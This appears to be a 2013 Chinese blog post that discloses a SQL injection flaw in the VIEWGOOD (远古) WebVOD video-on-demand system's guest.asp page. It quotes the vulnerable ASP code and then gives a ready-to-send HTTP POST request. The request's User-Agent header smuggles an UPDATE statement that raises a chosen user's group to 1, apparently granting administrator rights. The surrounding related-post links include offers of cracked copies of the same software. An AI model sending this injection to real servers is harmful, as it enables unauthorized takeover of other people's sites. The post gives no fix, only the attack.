远古视频点播系统的一个注入漏洞

于 2013-07-08 11:41:39 发布
阅读量966 收藏
点赞数
分类专栏: 黑客攻防 网络维护

VIEWGOOD VOD视频点播系统 (WebVOD)
漏洞产生于文件/webmedia/oemui/user/guest.asp,访问这个页面需要注册

相关代码:

    szAgent = Request.ServerVariables("HTTP_USER_AGENT")
    aTmpInfo = Split(szAgent, " (", -1, 1)
    aAgentInfo = Split(aTmpInfo(1), "; ", -1, 1)

    szBrowser = aAgentInfo(1)
    if Right(aAgentInfo(2), 1) = ")" or Right(aAgentInfo(2), 1) = ";" then
        szOS = Left(aAgentInfo(2), Len(aAgentInfo(2)) - 1)
    else
        szOS = aAgentInfo(2)
    end if
    szClientIP = Request.ServerVariables("REMOTE_ADDR")

    szSQL = "INSERT INTO GuestBook(CusTomer_ID,cont,ipaddr,ostype,browser,crdt) VALUES(" & iUserID & ",'" & szMemo & "','" & szClientIP & "','" & szOS & "','" & szBrowser & "','" & now &"')"
    con.Execute szSQL

HTTP_USER_AGENT我们可以自己构造

POST /webmedia/oemui/user/guest.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg,
Referer: http://you.are.fucked.cn/webmedia/oemui/user/guest.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0','');update Customer_Group set Group_ID=1 where Customer_ID=9--; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Host: you.are.fucked.cn
Content-Length: 75
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDCSACDTQQ=CGGFJOGANCPNAIAIABABHMHA;

memo=aaaa&submit=%B7%A2%CB%CD%D3%C3%BB%A7%C1%F4%D1%D4%D0%C5%CF%A2+%3E%3E%3E
wangmj518
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
远古VOD电影资料剧情采集工具
01-30
轻松帮你收集需要的电影资料 剧情 图片 演员
远古VOD5.0绿色破解版
10-22
在WIN2008中安装远古5.0破解版,也可以在为WIN2000,WIN2003下安装,绿色安装
最新远古VOD点播影视系统模板入侵
wangmj518的专栏
04-09 2501
这里是以前的一个,大家可以看看 /Article/200708/18630.html   漏洞文件webmedia/common/function/xtree.asp〈!--#include file="../dbcon.i
狂汗!VOD点播系统漏洞解析,***电影网站!
weixin_34080903的博客
11-29 1420
哎!!!VOD 点播系统的致命漏洞,又要又很多的电影网站完蛋了。。。。。 偶是偶然看见的,嘿嘿,现在再网上你是很难找到的哦。。。。 貌似现在只流传再内部,不过好多的网站已经修补了,毕竟破坏力比较大哦。。。 嘿嘿,下面就给大家看点好东西哦,,, 漏洞文件webmedia/common/function/xtree.asp〈!--#in...
解决远古VOD注入漏洞
wangmj518的专栏
07-08 1188
个人说明:写出来的目的更多的是为了能够让大家指点一下我的这篇文章那里有错误。。希望大家能够多多指点,。。让我的这篇文章能够更专业一点。。。。谢谢大家了。      giffer用远古VOD影视点播系统已经有一段时间了,非常钦佩远古科技所开发的无缓冲技术。但是自从giffer用了网上流行的VOD 5.0 后,就出现了一系列的问题。比如点播系统后台管理员密码被多次更改,百兆的带宽被别人疯狂盗
南京远古科技为山东东营市政府实施流媒体视频点播直播方案
09-26
南京远古软件公司为山东东营市政府实施的视频点播直播系统方案说明
南京远古校园网络电视台系统技术白皮书
09-26
南京远古软件有限公司新推校园网络电视台系统,深受广大学校的喜爱,文件是网络电视台系统技术白皮书
远古网络电视台三屏系统技术方案
09-26
南京远古软件公司网络电视台三屏系统技术方案
远古sqlserver学习视频
04-12
早期sqlserver学习视频
远古音视频直播(广播)系统 V2.5
03-16
在V2.1的基础上客户端支持“局域网登录”和“广域网登录”两种方式,支持音视频采集、直播分离,新增日志功能。支持“字幕及图片设置”,支持MPEG-1、MPEG-4格式“文件直播”功能,同时支持服务器端与客户端的界面...
远古VOD5.0破解版
08-30
远古VOD5.0破解版教程
远古播放器
03-14
远古播放器
远古vod破解
11-08
远古vod破解工具
闪雷影视系统旗舰版全自动采集下载入库的影视下载工具
08-07
【概括介绍】 一款全自动影视下载系统。 【基本介绍】 闪雷影视是一款集全自动采集,全自动下载,全自动入库于一体的影视下载工具。可下载各种类型的电影、电视剧、音乐mv、720P高清电影。 【软件功能】 1、自带全自动资源采集功能 2、自动全自动批量下载功能 3、自带全自动入库功能 4、影片清晰度预览功能 5、视频连载功能 6、自动下载影片简介 7、自动下载影片图片 8、自动影片归类 9、自动重命名影
企业数字化转型暨数据仓库(数仓)建设方案.pptx
05-06
企业数字化转型暨数据仓库(数仓)建设方案.pptx
2024年中国LED切割灯行业研究报告.docx
05-06
2024年中国LED切割灯行业研究报告
目前世界上最好的机器学习&深度学习&神经网络&图神经网络&卷积网络&多层感知机画图工具&基于PPT
05-06
在当今快速发展的人工智能领域中,一款集成了机器学习、深度学习、神经网络、图神经网络、卷积网络及多层感知机可视化功能的画图工具脱颖而出,成为全球范围内最受欢迎和认可的工具之一。这款工具不仅仅是一个简单的绘图软件,它的设计初衷是为了让复杂的网络结构和算法直观化,从而帮助研究者、学者及开发人员更容易地理解和分享他们的工作。 最令人印象深刻的特色之一是它基于PPT的编辑能力,这允许用户在熟悉的PPT编辑环境中创建、编辑和展示复杂的网络结构。用户可以利用拖拉组件、调整尺寸、修改颜色和形状等功能,无缝地将科研成果或项目展示集成到演示文稿中,极大地提高了工作的效率和表现力。 该工具不仅支持广泛的网络结构和模型,还包含丰富的库和模块,让用户能够轻松自定义和扩展自己的模型。它的用户界面友好、直观,无论是机器学习的新手还是资深研究员,都能快速上手,将精力更多地集中在创新和研究上,而不是图形的绘制和编辑上。 此外,它强大的共享和合作功能,使得团队成员可以实时共享他们的成果,促进了知识的交流和项目的进展。这款工具不仅改善了人工智能领域内部的工作方式,也为更广泛的受众提供了学习和理解复杂算法的窗口。 总
2024年中国B型超声诊断设备行业研究报告.docx
05-06
2024年中国B型超声诊断设备行业研究报告
node-v11.0.0-linux-armv7l.tar.xz
最新发布
05-06
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
用Python写一个万年历
09-04
代码首先导入了`calendar`库,然后定义了一个`get_calendar`函数,该函数接受一个年份作为参数,使用`TextCalendar`类获取指定年份的日历,然后调用`formatyear`方法返回日历的字符串表示。 `main`函数中使用一个...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值